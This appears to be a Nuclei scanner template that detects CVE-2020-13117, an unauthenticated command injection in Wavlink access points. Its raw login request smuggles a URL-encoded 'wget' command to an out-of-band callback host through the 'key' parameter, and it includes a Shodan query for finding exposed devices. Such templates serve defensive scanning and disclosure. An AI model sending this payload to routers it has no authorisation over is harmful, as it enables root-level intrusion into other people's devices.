47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2020-13117
|
|
|
|
info:
|
|
name: Wavlink Multiple AP - Unauthenticated RCE
|
|
author: gy741
|
|
severity: critical
|
|
description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized
|
|
which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
|
|
reference:
|
|
- https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-13117
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.title:"Wi-Fi APP Login"
|
|
tags: cve,cve2020,wavlink,rce,oast,router
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /cgi-bin/login.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: http://{{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "parent.location.replace"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|